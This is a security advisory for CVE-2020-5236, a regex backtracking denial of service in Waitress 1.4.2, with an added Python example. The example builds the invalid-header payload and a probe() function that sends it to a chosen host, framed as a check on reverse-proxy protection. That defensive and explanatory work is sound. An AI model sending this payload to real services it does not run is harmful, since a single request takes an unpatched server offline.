PT-2020-18332 · Waitress · Waitress

Fil Zembowicz · Published 2020-02-04 · Updated 2020-02-06 · CVE-2020-5236

CVSS v4.0: 6.9 (Medium)
Vector: AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
Name of the Vulnerable Software and Affected Versions: Waitress version 1.4.2

Description: The issue allows an attacker to take the service offline with a single request that carries an invalid header. When Waitress receives a header containing invalid characters, the regular expression used to validate it backtracks catastrophically, pinning the process at 100% CPU and blocking all other interactions. An example of an invalid header is "Bad-header: xxxxxxxxxxxxxxxx\x10", where \x10 denotes a single control byte (DLE), which is not permitted in a header value. Increasing the number of 'x' characters in the header increases the time Waitress spends in the regular expression engine. The issue was introduced in version 1.4.2, when the regular expression was updated to match the behaviour required by errata associated with RFC 7230.

Recommendations: For Waitress version 1.4.2, upgrade to version 1.4.3 as soon as possible; the regular expression used to validate incoming headers has been corrected in that release. If a reverse proxy is deployed in front of Waitress, it may already be rejecting requests that include invalid headers; verify this rather than assuming it. Note that Waitress validates headers in its own HTTP parser before the request reaches the WSGI application, so a filter in application or middleware code cannot mitigate this issue; any interim check has to sit in front of Waitress.
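The following is an added worked example and is not code from the Waitress project or from this advisory. It shows, for the mechanism described above, why one invalid byte at the end of a long header value makes a naively transcribed RFC 7230 field-value pattern backtrack exponentially, places a linear pattern for the same language beside it, and builds the raw request a practitioner would send to confirm that a reverse proxy rejects such a header before it reaches the backend. The two regular expressions are illustrative reconstructions of the grammar, not the expressions shipped in Waitress 1.4.2 or 1.4.3; `bad_header()`, `build_probe()` and `probe()` (with its host and port arguments) are hypothetical helpers; obs-fold is omitted from the grammar for brevity.

```python
"""Added example, not Waitress code. Shows why one invalid header byte makes a
naively transcribed RFC 7230 field-value regex backtrack exponentially, gives
a linear equivalent, and builds a raw probe for checking what sits in front
of a server. The patterns are illustrative reconstructions of the grammar,
not the expressions shipped in Waitress 1.4.2 or 1.4.3."""
import re
import socket
import time
from typing import Optional, Pattern, Tuple

# RFC 7230 section 3.2.6: field-vchar = VCHAR / obs-text; OWS = *( SP / HTAB )
VCHAR = r"[\x21-\x7e\x80-\xff]"
WS = r"[ \t]"

# Naive transcription of the errata grammar (obs-fold left out):
#   field-content = field-vchar [ 1*( SP / HTAB / field-vchar ) field-vchar ]
#   field-value   = *( field-content )
# A `+` nested inside a `*`, with field-vchar present in both, means that when
# the final `\Z` fails at the control byte the engine retries every way of
# splitting the run of x's into field-contents: 2^(n-1) splits for n x's.
VULNERABLE_VALUE_RE: Pattern[str] = re.compile(
    rf"^(?:{VCHAR}(?:(?:{WS}|{VCHAR})+{VCHAR})?)*\Z"
)

# Same language (empty, one vchar, or vchar ... vchar with SP/HTAB allowed in
# between) written without nested quantifiers, so a reject costs O(n).
INNER = r"[ \t\x21-\x7e\x80-\xff]"
SAFE_VALUE_RE: Pattern[str] = re.compile(rf"^(?:{VCHAR}(?:{INNER}*{VCHAR})?)?\Z")

# Characters allowed in a field-name token (RFC 7230 section 3.2.6).
TOKEN_RE = re.compile(r"[!#$%&'*+.^_`|~0-9A-Za-z-]+\Z")


def parse_header_line(line: bytes, value_re: Pattern[str]) -> Optional[Tuple[str, str]]:
    """Split one 'Name: value' line and validate the value with value_re.
    Returns (name, value) or None for a malformed line. Bytes are decoded as
    latin-1 so every byte, including obs-text, maps to exactly one character."""
    text = line.decode("latin-1")
    name, sep, value = text.partition(":")
    if not sep or TOKEN_RE.match(name) is None:
        return None
    value = value.strip(" \t")  # optional whitespace around the value
    if value_re.match(value) is None:
        return None
    return name, value


def bad_header(n: int) -> bytes:
    """Constructed payload in the shape the advisory describes: n x's followed
    by 0x10 (DLE), a control byte that is not a field-vchar."""
    return b"Bad-header: " + b"x" * n + b"\x10"


def rejection_time(value_re: Pattern[str], n: int) -> float:
    """Seconds value_re needs to reject bad_header(n)."""
    start = time.perf_counter()
    if parse_header_line(bad_header(n), value_re) is not None:
        raise AssertionError("payload unexpectedly accepted")
    return time.perf_counter() - start


def build_probe(host: str, n: int = 16) -> bytes:
    """Minimal HTTP/1.1 request carrying bad_header(n)."""
    return (b"GET / HTTP/1.1\r\nHost: " + host.encode("ascii") + b"\r\n"
            + bad_header(n) + b"\r\nConnection: close\r\n\r\n")


def probe(host: str, port: int, n: int = 16, timeout: float = 5.0) -> str:
    """Hypothetical helper: send build_probe() and classify the reply.
    'rejected'    a 400 came back (a proxy, or a server that validates safely)
    'other'       some other status line
    'closed'      connection dropped without a status line
    'no-response' nothing within timeout, consistent with a backend that is
                  still backtracking. Run only against hosts you are
                  responsible for: against unpatched Waitress 1.4.2 this
                  request IS the outage."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe(host, n))
        try:
            head = sock.recv(64)
        except socket.timeout:
            return "no-response"
    if not head:
        return "closed"
    return "rejected" if head.startswith(b"HTTP/1.") and b" 400 " in head else "other"


if __name__ == "__main__":
    for n in (8, 12, 16):
        print(f"n={n:2d}  nested regex {rejection_time(VULNERABLE_VALUE_RE, n):8.4f}s"
              f"   linear regex {rejection_time(SAFE_VALUE_RE, n):8.6f}s")
    # e.g. print(probe("127.0.0.1", 8080)) against a local deployment
```

Running the block prints the rejection time for 8, 12 and 16 x's; the nested pattern roughly doubles with every added x while the linear one stays flat, which is the behaviour the advisory describes. `probe()` is the check for the reverse-proxy recommendation: a `rejected` result means the request never reaches the backend, anything else means the proxy is forwarding it and the fix in 1.4.3 is the only real mitigation.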

Tags: Exploit · Fix · Resource Exhaustion


Related Identifiers

CVE-2020-5236
GHSA-73M2-3PWG-5FGC
PYSEC-2020-155

Affected Products

Waitress